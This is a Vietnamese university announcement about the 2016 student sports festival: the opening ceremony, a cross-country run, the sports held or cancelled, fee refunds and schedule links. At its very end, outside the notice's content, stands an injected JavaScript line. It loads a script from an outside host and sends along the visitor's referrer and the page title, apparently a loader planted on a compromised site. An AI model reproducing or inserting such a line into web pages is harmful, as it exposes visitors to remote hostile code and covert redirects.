HỘI THAO SINH VIÊN 2016 – Thông báo số 04

1923

THÔNG BÁO SỐ 04

V/v Tổ chức Lễ khai mạc hội thao, tình hình các bộ môn thi đấu và lịch thi đấu

Căn cứ vào kế hoạch số 02/KH-HSV về việc tổ chức Hội thao sinh viên trường ĐH KHTN lần XI, căn cứ góp ý của sinh viên các khoa và sự nhất trí của BTC Hội thao, BTC Hội thao sinh viên trường ĐH KHTN thông tin đến các Đoàn vận động viên và sinh viên về một số điều chỉnh thể lệ đăng ký và thi đấu với nội dung cụ thể như sau:

1.  Thông tin về việc tổ chức Lễ khai mạc – Giải việt dã sinh viên – Thanh niên khỏe

1.1 Lễ khai mạc:

• Thời gian: 8h00, ngày 13/03/2016 (chủ nhật)
  • Địa điểm: Sân trường Đại học Khoa học Tự nhiên, cơ sở 2 (Thủ Đức – Dĩ An)
  • Yêu cầu: TẤT CẢ các vận động viên đã đăng ký hội thao phải tham gia Lễ Khai mạc. Trường hợp không tham gia được Khai mạc phải báo với Trưởng Đoàn

1.2  Giải việt dã:

• Thời gian: 6h00, ngày 13/03/2016 (chủ nhật)
  • Địa điểm tập trung: Cổng Ký túc xá (KTX) Khu B – ĐHQG-HCM
  • Đường chạy: từ KTX khu B đến cổng trường ĐH Khoa học Tự nhiên, cơ sở 2 (Thủ Đức – Dĩ An)
  • Mỗi sinh viên tham gia hoàn thành đường chạy từ 30 phút trở xuống được cấp Chứng nhận Thanh niên khỏe.
  • Sẽ có 3 giải: 1 giải nhất nam, 1 giải nhất nữ và 1 giải nhất toàn đoàn dành cho đoàn có số lượng vận động viên tham gia chạy việt dã nhiều nhất (200.000 đồng/giải)
  • Lưu ý: các sinh viên tham gia việt dã phải mang theo thẻ sinh viên để quét thẻ điểm danh và nhận số dán lên áo.

1.3  Kiểm tra Thanh niên khỏe:

• Thời gian: 9h30 – 11h30, ngày 13/3/2016, chủ nhật
  • Địa điểm: sân trường ĐH Khoa học Tự nhiên cơ sở 2 (Thủ Đức – Dĩ An)

2.  Thông tin về các bộ môn thi đấu

2.1  Các bộ môn sẽ tổ chức:

• Bóng đá nam, nữ. Địa điểm thi: Bóng đá nam – Sân chuẩn 11 người trường ĐH Thể dục Thể thao TP.HCM, Bóng đá nữ  – Sân chuẩn 5 người Ký Túc xá Khu A ĐHQG-HCM
  • Bóng chuyền nam. Địa điểm thi: Nhà thi đấu TDTT trường ĐH Khoa học Tự nhiên cơ sở 2
  • Bóng rổ nam. Địa điểm thi: Khu thi đấu trong nhà trường ĐH Thể dục Thể thao TP.HCM
  • Cầu lông đơn nam, đơn nữ, đôi nam, đôi nữ. Địa điểm thi: Khu thi đấu trong nhà trường ĐH Thể dục Thể thao TP.HCM
  • E-sport (Địa điểm thi thông báo kèm lịch thi)
  • Cờ vua. Địa điểm thi: Trường ĐH Khoa học Tự nhiên cơ sở 2
  • Cờ tướng. Địa điểm thi: Trường ĐH Khoa học Tự nhiên cơ sở 2

2.2  Các bộ môn không tổ chức

• Bóng chuyền nữ
  • Bóng rổ nữ
  • Bóng bàn nam, nữ
  • Bơi lội (Bơi sải, bơi ếch)

Lý do: Không đảm bảo số lượng tối thiểu để tổ chức giải đấu cấp trường.

Các trường hơp này sẽ được hoàn trả 100% lệ phí đã đóng. Sinh viên nhận lại lệ phí từ Trưởng đoàn thể thao của khoa sau ngày 20/03/2016.

2.3  Thông tin về lịch thi đấu các bộ môn có file đính kèm, riêng các nội dung thi của bộ môn cầu lông và E-Sports sẽ cập nhật vào lúc 21h00 ngày 09/03/2016 trên website Đoàn trường – Hội Sinh viên trường (www.doantn.hcmus.edu.vn) và fanpage Hội Sinh viên trường (facebook.com/hsvkhtn). Các thí sinh trong bộ môn cờ vua và cờ tướng nếu được xếp vào trận đấu chỉ có 1 người, nghĩa là bạn sẽ được đặc cách 1 trận vòng loại.

Để công tác tổ chức được diễn ra hiệu quả, đúng tiến độ, BTC đề nghị các cơ sở Hội và các Đoàn vận động viên thông tin đầy đủ và rộng rãi cho toàn thể sinh viên trường.

Trân trọng./.

Lịch thi đấu: https://goo.gl/n6pG9a

Cây thi đấu cờ vua – cờ tướng: https://goo.gl/6oqx4f

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;